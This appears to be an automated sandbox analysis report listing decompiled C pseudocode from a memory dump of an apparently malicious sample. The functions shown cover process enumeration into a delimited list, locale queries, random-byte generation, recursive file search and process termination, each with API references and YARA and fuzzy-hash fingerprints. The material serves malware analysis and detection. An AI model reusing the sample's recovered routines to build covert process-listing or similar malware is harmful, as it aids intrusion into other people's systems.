                                            0x0043f899
                                            0x0043f89b
                                            0x0043f89b
                                            0x0043f8a7
                                            0x0043f8b5
                                            0x00000000
                                            0x0043f8b7
                                            0x0043f8b7
                                            0x0043f8ba
                                            0x0043f8c0
                                            0x0043f8c3
                                            0x0043f8d3
                                            0x0043f8d8
                                            0x0043f8e6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043f8c5
                                            0x0043f8c5
                                            0x0043f8c8
                                            0x0043f8ce
                                            0x0043f8cf
                                            0x0043f8d1
                                            0x0043f8e8
                                            0x0043f8ec
                                            0x0043f8f4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043f8d1
                                            0x0043f8c3
                                            0x0043f8b5
                                            0x0043f903
                                            0x0043f909
                                            0x0043f909
                                            0x0043f881
                                            0x0043f846
                                            0x0043f808

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00435A9B,?,?,?,?,004354F2,?,00000004), ref: 0043F82A
                                            • _wcschr.LIBVCRUNTIME ref: 0043F8BA
                                            • _wcschr.LIBVCRUNTIME ref: 0043F8C8
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00435A9B,00000000,00435BBB), ref: 0043F96B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                            • String ID:
                                            • API String ID: 4212172061-0
                                            • Opcode ID: 90bfbaf151f348b81f3747cf20fc991cc93298be320d468e02e915652b7b6f3e
                                            • Instruction ID: 4708ac8838d82e5b38cd46f5dc308452e26a83d1edd9be3af6d8816c2a1ed56d
                                            • Opcode Fuzzy Hash: 90bfbaf151f348b81f3747cf20fc991cc93298be320d468e02e915652b7b6f3e
                                            • Instruction Fuzzy Hash: 8D61DA71E00306AAEB24AB75CC46BA773A8EF0C714F14143FF905D7281EB78E9498769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409973, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00409973(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020CF(__ebx, __ecx);
				 *0x460e11 = E0041132E(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E004031DB(_t76,  &_v28,  &_v864);
						_t47 = E0041107C(_t76,  &_v340, E0041135C(_v892) & 0x000000ff);
						_t48 = E0041107C(_t76,  &_v316, _v892);
						_t50 = E004111F2(_t76,  &_v268, E00411392( &_v292, _v892));
						E00401FA1(_t129, _t58, _t130, E00402973(_t76,  &_v52, E00405870( &_v76, E00402973(_t76,  &_v100, E00405870( &_v124, E00402973(_t76,  &_v148, E00405870( &_v172, E00402973(_t76,  &_v196, E004058E6(_t76,  &_v220, _t129, __eflags, E004111F2(_t76,  &_v244,  &_v28)), __eflags, 0x455ecc), _t50), __eflags, 0x455ecc), _t48), __eflags, 0x455ecc), _t47), __eflags, "|"));
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E004031D1();
						E00401F97();
						E00401F97();
						E004031D1();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}


























                                            0x00409973
                                            0x00409973
                                            0x0040997e
                                            0x00409980
                                            0x0040998e
                                            0x00409999
                                            0x0040999d
                                            0x004099a9
                                            0x004099b5
                                            0x00409b34
                                            0x004099ca
                                            0x004099e8
                                            0x004099ff
                                            0x00409a23
                                            0x00409aa4
                                            0x00409aac
                                            0x00409ab4
                                            0x00409abc
                                            0x00409ac4
                                            0x00409acf
                                            0x00409ada
                                            0x00409ae5
                                            0x00409af0
                                            0x00409afb
                                            0x00409b06
                                            0x00409b11
                                            0x00409b1c
                                            0x00409b27
                                            0x00409b2f
                                            0x00409b2f
                                            0x00409b4b
                                            0x00409b4b
                                            0x00409b58

                                            APIs
                                              • Part of subcall function 0041132E: GetCurrentProcess.KERNEL32(00000000,?,00000002,00411C22,WinDir,00000000,00000000), ref: 0041133F
                                              • Part of subcall function 0041132E: IsWow64Process.KERNEL32(00000000,?,00000002,00411C22,WinDir,00000000,00000000), ref: 00411346
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00409993
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004099B5
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409B3C
                                            • CloseHandle.KERNEL32(00000000), ref: 00409B4B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                            • String ID:
                                            • API String ID: 715332099-0
                                            • Opcode ID: 85e917a503ee3c4486a0ffaccc1de8998ff72a3174bd718d0ac8322e4ee9d465
                                            • Instruction ID: 97a87a07636520ad5845b2bd87a9e0eeb10731b1ccf6f3de5315d5e8064bb070
                                            • Opcode Fuzzy Hash: 85e917a503ee3c4486a0ffaccc1de8998ff72a3174bd718d0ac8322e4ee9d465
                                            • Instruction Fuzzy Hash: 28413C31A106199AC714FB61DC56AEEB775AF15308F1041BEF40AA61E2EF385F89CE4C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FB33, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E0043FB33(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x45f014; // 0x8d941b67
				_v8 = _t50 ^ _t133;
				_t92 = E00438D61(__ebx, __ecx, __edx);
				_t129 =  *(E00438D61(_t92, __ecx, __edx) + 0x34c);
				_t132 = E0043FE5B(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E00442CC1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return E004294CB(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = E00442CC1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = E00442CC1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E0043FFB3(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E0043FFB3(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = E00442CC1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E0043FF8F(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E00444926(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}


































                                            0x0043fb3e
                                            0x0043fb45
                                            0x0043fb53
                                            0x0043fb5b
                                            0x0043fb6a
                                            0x0043fb76
                                            0x0043fb8f
                                            0x0043fba6
                                            0x0043fbab
                                            0x0043fbb4
                                            0x0043fbb6
                                            0x0043fc69
                                            0x0043fc72
                                            0x0043fc74
                                            0x0043fd66
                                            0x0043fd6d
                                            0x0043fd70
                                            0x0043fd80
                                            0x0043fd80
                                            0x0043fc87
                                            0x0043fc98
                                            0x0043fc9e
                                            0x0043fca0
                                            0x0043fcb3
                                            0x0043fcba
                                            0x0043fcbc
                                            0x0043fd28
                                            0x0043fd2b
                                            0x00000000
                                            0x00000000
                                            0x0043fd2d
                                            0x0043fd30
                                            0x00000000
                                            0x00000000
                                            0x0043fd3c
                                            0x0043fd43
                                            0x0043fd45
                                            0x00000000
                                            0x00000000
                                            0x0043fd47
                                            0x0043fd4c
                                            0x0043fd54
                                            0x0043fd56
                                            0x00000000
                                            0x00000000
                                            0x0043fd58
                                            0x0043fd5e
                                            0x0043fd61
                                            0x0043fd61
                                            0x0043fd63
                                            0x0043fd63
                                            0x00000000
                                            0x0043fd61
                                            0x0043fcbe
                                            0x0043fcc4
                                            0x0043fcc6
                                            0x0043fcc9
                                            0x0043fcdb
                                            0x0043fcde
                                            0x00000000
                                            0x00000000
                                            0x0043fce0
                                            0x0043fce6
                                            0x0043fcec
                                            0x0043fcec
                                            0x0043fcef
                                            0x0043fcf2
                                            0x0043fcf2
                                            0x0043fd03
                                            0x0043fd06
                                            0x0043fd22
                                            0x00000000
                                            0x0043fd22
                                            0x0043fd08
                                            0x0043fd0c
                                            0x0043fd14
                                            0x0043fd16
                                            0x00000000
                                            0x00000000
                                            0x0043fd18
                                            0x0043fd1e
                                            0x0043fcd3
                                            0x0043fcd3
                                            0x00000000
                                            0x0043fcd3
                                            0x0043fccb
                                            0x0043fccb
                                            0x0043fccb
                                            0x0043fcd1
                                            0x00000000
                                            0x0043fcd1
                                            0x0043fca2
                                            0x0043fb94
                                            0x00000000
                                            0x0043fb96
                                            0x0043fbca
                                            0x0043fbd8
                                            0x0043fbde
                                            0x0043fbe0
                                            0x00000000
                                            0x00000000
                                            0x0043fbec
                                            0x0043fbf2
                                            0x0043fbf3
                                            0x0043fbf5
                                            0x0043fc02
                                            0x0043fc05
                                            0x00000000
                                            0x00000000
                                            0x0043fc07
                                            0x0043fc0b
                                            0x0043fc4f
                                            0x0043fc4f
                                            0x0043fc51
                                            0x0043fc54
                                            0x00000000
                                            0x00000000
                                            0x0043fc57
                                            0x0043fc5d
                                            0x0043fc5f
                                            0x00000000
                                            0x00000000
                                            0x0043fc61
                                            0x0043fc61
                                            0x0043fc64
                                            0x00000000
                                            0x0043fc64
                                            0x0043fc1a
                                            0x0043fc1f
                                            0x0043fc22
                                            0x0043fc24
                                            0x00000000
                                            0x00000000
                                            0x0043fc26
                                            0x0043fc26
                                            0x0043fc29
                                            0x0043fc2c
                                            0x0043fc2f
                                            0x0043fc32
                                            0x0043fc32
                                            0x0043fc35
                                            0x0043fc38
                                            0x0043fc38
                                            0x0043fc45
                                            0x0043fc48
                                            0x0043fc4a
                                            0x0043fc4a
                                            0x0043fbf7
                                            0x0043fbf7
                                            0x0043fbfd
                                            0x0043fc66
                                            0x0043fc66
                                            0x0043fc66
                                            0x00000000
                                            0x0043fbf5
                                            0x0043fb91
                                            0x0043fb91
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00438D61: GetLastError.KERNEL32(?,00000000,00432FF3,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438D65
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438D98
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DD9
                                              • Part of subcall function 00438D61: _abort.LIBCMT ref: 00438DDF
                                              • Part of subcall function 00438D61: _free.LIBCMT ref: 00438DC0
                                              • Part of subcall function 00438D61: SetLastError.KERNEL32(00000000,?,00410F24,-00462904,?,?,?,?,?,00407D90,.vbs), ref: 00438DCD
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043FB87
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043FBD8
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043FC98
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                            • String ID:
                                            • API String ID: 2829624132-0
                                            • Opcode ID: 6502468779bfd0ea3f05dfc2a93d7b618381a2a1ec2e88e445a003165eb5b7f6
                                            • Instruction ID: c3b66c991d6f1dd7a2a54a7da8e5a9846f0d744c44ef493718e63700066d6b6d
                                            • Opcode Fuzzy Hash: 6502468779bfd0ea3f05dfc2a93d7b618381a2a1ec2e88e445a003165eb5b7f6
                                            • Instruction Fuzzy Hash: 2961B27194020B9BEB289F25CD86B7AB7A8FF08304F10517BED05C6681E778D949DB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00427D99, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00427D99(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}






                                            0x00427da7
                                            0x00427da9
                                            0x00427db6
                                            0x00427dcb
                                            0x00427dd5
                                            0x00000000
                                            0x00427ddb
                                            0x00427dcd
                                            0x00427dba
                                            0x00427dba
                                            0x00000000
                                            0x00427dba
                                            0x00427db8
                                            0x00000000

                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,00427B50,00000024,00000006,00000000,00000000), ref: 00427DAE
                                            • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,00427B50,00000024,00000006,00000000,00000000,?,?,?,?,?,?,00422372), ref: 00427DC3
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00427B50,00000024,00000006,00000000,00000000,?,?,?,?,?,?,00422372,00000006), ref: 00427DD5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Context$AcquireRandomRelease
                                            • String ID:
                                            • API String ID: 1815803762-0
                                            • Opcode ID: a5ae75c682411f6fc3bae44531b093b29795873a78c7935c42e4f5df8d28ad4a
                                            • Instruction ID: 140a086779efc7e0ecfdfaf3cd6edb4d041bc3595e2153f5a77641e9bd086024
                                            • Opcode Fuzzy Hash: a5ae75c682411f6fc3bae44531b093b29795873a78c7935c42e4f5df8d28ad4a
                                            • Instruction Fuzzy Hash: 57F0923635C220BBEF300F56BC08FA73F59DF86BA5F600136F649E40E0D6628800A66C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00434340, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00434340(int _a4) {
				void* _t14;
				void* _t16;

				if(E00438414(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00434381(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                                            0x0043434c
                                            0x00434368
                                            0x00434368
                                            0x00434371
                                            0x0043437a

                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000003,?,00434316,00000003,0045D5A0,0000000C,00434429,00000003,00000002,00000000,?,00436F32,00000003), ref: 00434361
                                            • TerminateProcess.KERNEL32(00000000,?,00434316,00000003,0045D5A0,0000000C,00434429,00000003,00000002,00000000,?,00436F32,00000003), ref: 00434368
                                            • ExitProcess.KERNEL32 ref: 0043437A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 73f657c6363b02f1abc95ee9e63c3a4a971f17dcea05562412012f659e7a5f17
                                            • Instruction ID: c17419e5a1c196b24eb7f3ec506446d6c623c0dcb0077b90d067e8f33838c6da
                                            • Opcode Fuzzy Hash: 73f657c6363b02f1abc95ee9e63c3a4a971f17dcea05562412012f659e7a5f17
                                            • Instruction Fuzzy Hash: 29E04631101609ABDF116F51DD4AA8A3B6AFB89742F000029FC088B222CB39ED46DA58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043C2E9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0043C2E9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E004368EF(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0044598B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0043C528(_a16, __eflags, _t111);
							E00437795(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0044598B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00430CA7();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x45f014; // 0x8d941b67
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E004459E0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E0042B710(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0043C2E9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00445540(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0043C141);
									}
								} else {
									_push(_t55);
									_t57 = E0043C2E9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0043C2E9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E004294CB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































                                            0x0043c2ee
                                            0x0043c2ef
                                            0x0043c2f2
                                            0x0043c2f2
                                            0x0043c2f5
                                            0x0043c2f5
                                            0x0043c2f7
                                            0x0043c2f8
                                            0x0043c301
                                            0x0043c302
                                            0x0043c305
                                            0x0043c308
                                            0x0043c30d
                                            0x0043c314
                                            0x0043c315
                                            0x0043c316
                                            0x0043c319
                                            0x0043c323
                                            0x0043c326
                                            0x0043c327
                                            0x0043c329
                                            0x0043c33d
                                            0x0043c33d
                                            0x0043c340
                                            0x0043c34a
                                            0x0043c34f
                                            0x0043c352
                                            0x0043c354
                                            0x00000000
                                            0x0043c356
                                            0x0043c35a
                                            0x0043c363
                                            0x0043c369
                                            0x00000000
                                            0x0043c36c
